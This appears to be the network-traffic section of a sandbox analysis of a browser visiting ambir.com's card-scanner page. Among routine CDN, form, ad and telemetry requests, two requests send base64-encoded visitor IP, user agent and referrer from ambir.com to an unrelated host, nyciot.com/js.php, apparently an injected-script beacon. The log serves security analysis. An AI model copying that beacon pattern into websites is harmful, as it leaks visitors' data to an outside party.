      Source: global trafficHTTP traffic detected: GET /js.php?device=windows&ip=OC40Ni4xMjMuNzU=&refferer=aHR0cHM6Ly9hbWJpci5jb20vYW1iaXItY2FyZC1zY2FubmVycy8=&browser=Q2hyb21l&ua=bW96aWxsYS81LjAgKHdpbmRvd3MgbnQgMTAuMDsgd2luNjQ7IHg2NCkgYXBwbGV3ZWJraXQvNTM3LjM2IChraHRtbCwgbGlrZSBnZWNrbykgY2hyb21lLzExNy4wLjAuMCBzYWZhcmkvNTM3LjM2&domain=aHR0cHM6Ly9ueWNpb3QuY29t&loc=VVM=&is_ajax=1 HTTP/1.1Host: nyciot.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ambir.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: www.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /static/showcaptcha?digest=1_C_38981b8bddce8f162a418db411f998572c5cedc5527ed5cb91c0d48ae1d4feb63474de35340d2e69db0bcf470182544679866327c1bf1bf70db3eecfa72f2b6c HTTP/1.1Host: accounts.zoho.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://forms.zohopublic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /forms/images/warning-info.607d397302b1f344f8d8df1258004046.png HTTP/1.1Host: static.zohocdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://forms.zohopublic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /buy-button/latest/buy-button-storefront.min.js HTTP/1.1Host: sdks.shopifycdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /forms/images/loader.79de1b954774690fff0e7345d82faa25.gif HTTP/1.1Host: static.zohocdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://forms.zohopublic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /forms/js/formstplivejs.5598e1e583c1d09fc270b76b7bc87fed.js HTTP/1.1Host: static.zohocdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://forms.zohopublic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /forms/js/formsthirdpartylivejs.62943a8ee9919d8253e7be70bab3de1c.js HTTP/1.1Host: static.zohocdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://forms.zohopublic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /forms/js/formscommonlive.edbb0f480ff95d2fca0876bafe97f584.js HTTP/1.1Host: static.zohocdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://forms.zohopublic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /forms/js/formslive.a18412a662b0ec06aad976efc699e409.js HTTP/1.1Host: static.zohocdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://forms.zohopublic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-includes/images/blank.gif HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F; isCompleted=true; _ga_5NGH3KRVGD=GS1.1.1732134500.1.0.1732134500.60.0.1978750408; _ga=GA1.1.59994235.1732134501; _gcl_au=1.1.1093817975.1732134501
      Source: global trafficHTTP traffic detected: GET /apps/app/dist/js/app.js HTTP/1.1Host: acsbapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /opensans/font.woff HTTP/1.1Host: webfonts.zohowebstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://forms.zohopublic.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://forms.zohopublic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1070729751/?random=1732134501018&cv=11&fst=1732134501018&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Ambir%20Card%20Scanners%20-%20AMBIR%20Technology&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/10/card-document-scanners_225h.jpg HTTP/1.1Host: ambir.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F; isCompleted=true; _ga_5NGH3KRVGD=GS1.1.1732134500.1.0.1732134500.60.0.1978750408; _ga=GA1.1.59994235.1732134501; _gcl_au=1.1.1093817975.1732134501
      Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /static/showcaptcha?digest=1_C_38981b8bddce8f162a418db411f998572c5cedc5527ed5cb91c0d48ae1d4feb63474de35340d2e69db0bcf470182544679866327c1bf1bf70db3eecfa72f2b6c HTTP/1.1Host: accounts.zoho.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jsclient/loader.js HTTP/1.1Host: static.olark.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /j/GXXT3DJJNNBKHGBC62RAND/roundtrip.js HTTP/1.1Host: s.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /forms/images/warning-info.607d397302b1f344f8d8df1258004046.png HTTP/1.1Host: static.zohocdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/08/slide2-1024x603.jpg HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F; isCompleted=true; _ga_5NGH3KRVGD=GS1.1.1732134500.1.0.1732134500.60.0.1978750408; _ga=GA1.1.59994235.1732134501; _gcl_au=1.1.1093817975.1732134501
      Source: global trafficHTTP traffic detected: GET /wp-includes/images/blank.gif HTTP/1.1Host: ambir.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F; isCompleted=true; _ga_5NGH3KRVGD=GS1.1.1732134500.1.0.1732134500.60.0.1978750408; _ga=GA1.1.59994235.1732134501; _gcl_au=1.1.1093817975.1732134501
      Source: global trafficHTTP traffic detected: GET /forms/images/loader.79de1b954774690fff0e7345d82faa25.gif HTTP/1.1Host: static.zohocdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/text-editor.2c35aafbe5bf0e127950.bundle.min.js HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F; isCompleted=true; _ga_5NGH3KRVGD=GS1.1.1732134500.1.0.1732134500.60.0.1978750408; _ga=GA1.1.59994235.1732134501; _gcl_au=1.1.1093817975.1732134501
      Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /js.php?device=windows&ip=OC40Ni4xMjMuNzU=&refferer=aHR0cHM6Ly9hbWJpci5jb20vYW1iaXItY2FyZC1zY2FubmVycy8=&browser=Q2hyb21l&ua=bW96aWxsYS81LjAgKHdpbmRvd3MgbnQgMTAuMDsgd2luNjQ7IHg2NCkgYXBwbGV3ZWJraXQvNTM3LjM2IChraHRtbCwgbGlrZSBnZWNrbykgY2hyb21lLzExNy4wLjAuMCBzYWZhcmkvNTM3LjM2&domain=aHR0cHM6Ly9ueWNpb3QuY29t&loc=VVM=&is_ajax=1 HTTP/1.1Host: nyciot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
